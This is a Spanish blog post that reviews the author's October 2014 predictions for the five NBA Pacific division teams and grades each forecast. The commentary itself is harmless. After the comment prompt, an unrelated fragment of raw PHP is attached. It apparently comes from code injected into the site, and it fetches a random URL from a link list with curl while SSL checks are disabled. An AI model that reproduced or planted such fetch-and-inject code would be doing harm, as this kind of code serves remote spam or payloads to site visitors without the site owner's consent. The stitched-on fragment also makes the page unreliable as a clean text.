Revisando los pronósticos 2015: Pacific

22 de March de 2015 por MagicJohnson32

Recuperemos los pronósticos que hicimos en octubre sobre los equipos de la división Pacific, empezando por el gran dominador de la Conferencia Oeste. No acertamos, ni mucho menos, a imaginar unos Warriors a este nivel, pero en nuestra defensa, ni Steve Kerr soñaba con la campaña que están disfrutando en Oakland.

GOLDEN STATE WARRIORS

Pronóstico Octubre 2014: 49 victorias, última plaza de Playoffs.

Probabilidad de acierto: Remota.

Calificación pronóstico: F

No pelearán los Warriors la última plaza de playoffs sino el título honorífico de campeón de la liga regular. Existían dudas razonables sobre cómo gestionaría un entrenador debutante un grupo que venía de decepcionar el curso pasado, con una segunda unidad que se había devaluado alarmantemente y en un banquillo que se antojaba caliente tras el fulgurante despido de Marc Jackson. Steve Kerr siempre ha demostrado cabeza allá por donde ha estado y en tan sólo unos meses ha dejado su sello, ajustando con ojo clínico los desequilibrios que parecían crónicos en la franquicia de la Bahía. Por fin disfrutamos del fabuloso despliegue ofensivo de Curry, Klay Thompson y compañía pero con mayor consistencia, complementándose a la perfección artistas y “currantes” para alcanzar un punto defensivo que no conocían ni los más viejos del lugar. El diferencial, con toda lógica, es de largo el mejor de toda la liga y el rendimiento de todos es casi inmejorable. En condiciones normales será muy difícil doblegarles… pero si les da por desatar todo su talento en los cruces, será directamente imposible.

LOS ÁNGELES CLIPPERS

Pronóstico Octubre 2014: 60 victorias, disputando el primer puesto del Oeste.

Probabilidad de acierto: Baja

Calificación pronóstico: D

En el Oeste un 65% de victorias te condena irremediablemente a la parte baja del cuadro y a una primera ronda terrorífica con desventaja campo que fácilmente puede terminar en una eliminación temprana. Esperábamos más de los Clippers que de todos los equipos que le preceden en la tabla. No es que hayan jugado catastróficamente mal pues son el segundo mejor ataque de la liga, el problema es que defienden muy poco, especialmente si tenemos en cuenta que les dirije el mismo tipo que diseñó a aquellos Celtics pretorianos. Contábamos con una evolución evidente en esta faceta el segundo año de Doc Rivers en Los Ángeles. Por si fuera poco la rotación queda limitada a 5 o 6 hombres útiles, con unos cuantos “ilustres” que ni están ni se les espera. Si quedó un poso de amargura en la mejor campaña de su historia y en playoffs este proyecto aún no ha terminado nunca de rendir… se masca la tragedia.

PHOENIX SUNS

Pronóstico Octubre 2014: 44 victorias y fuera de Play Off.

Probabilidad de acierto: Alta

Calificación pronóstico: B+

El año pasado todos fuimos un poco de los Suns. Este curso la historia de David contra “una banda de Goliats” parece que no resulta tan estimulante, incluso a pesar de que tiene tanto mérito o más por aquello de que “Ya no van de tapados y muchos equipos los tomarán en serio desde el inicio”. Quizá sea porque el cuento tiene toda la pinta de terminar igual de mal o peor… de hecho ni ellos mismos se lo han creído, siendo uno de los equipos que más han mutado en el “mercado de invierno”. Duele un poco haber visto a Dragic salir por la puerta de atrás tras los grandes ratos que les ha brindado. En realidad siempre fue un suicidio defender así en esta conferencia. Sólo queda que los Thunder hagan el resto.

SACRAMENTO KINGS

Pronóstico Octubre 2014: 30-52. Lo mismo de todos los años. El equipo no da para más, está en una fase de estancamiento clara que solo se puede solucionar con un traspaso gordo.

Probabilidad de acierto: Alta

Calificación pronóstico: A-

Se junta el hambre con las ganas de comer. Rara vez ha habido muchos mimbres en Sacramento para hacer un equipo ganador. No son habituales allí las temporadas con balance positivo. Por todo esto para muchos fue más difícil de entender si cabe la destitución fulminante de Mike Malone, tras un prometedor comienzo. No es que llegáramos a creer en ningún momento que estaban en disposición de mirarle a la cara a los cocos, pero sí que el técnico había logrado inculcar en sus mejores hombres cierta implicación en el proyecto sentando los cimientos de un futuro mejor. Nada más lejos de la realidad. Tenía las horas contadas y los Kings, un plan maestro que sólo tiene sentido para ellos.

LOS ÁNGELES LAKERS

Pronóstico Octubre 2014: 35 victorias, fuera de Playoffs.

Probabilidad de acierto: Nula

Calificación pronóstico: D

El crepúsculo de los dioses viene marcado por la tragedia del cruel ocaso de Kobe Bryant y el contrato que muchos censuran. Jamás sabremos cómo sería de potente la plantilla sin esa carga, pero sin Nash retirado en la práctica, Randle roto en su primer partido, Kobe machacado por el destino y Henry prácticamente inédito, sólo se podía esperar quedar últimos del oeste. A Byron Scott le sangra la úlcera viendo defender a los suyos. Resulta irónico que en el olimpo donde se exhiben las zamarras de Magic, Chamberlain o Kareem hoy se suspire por las andanzas de Clarkson… en el mejor de los casos. Los tentáculos de la crisis alcanzan hasta a los más inimaginables.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>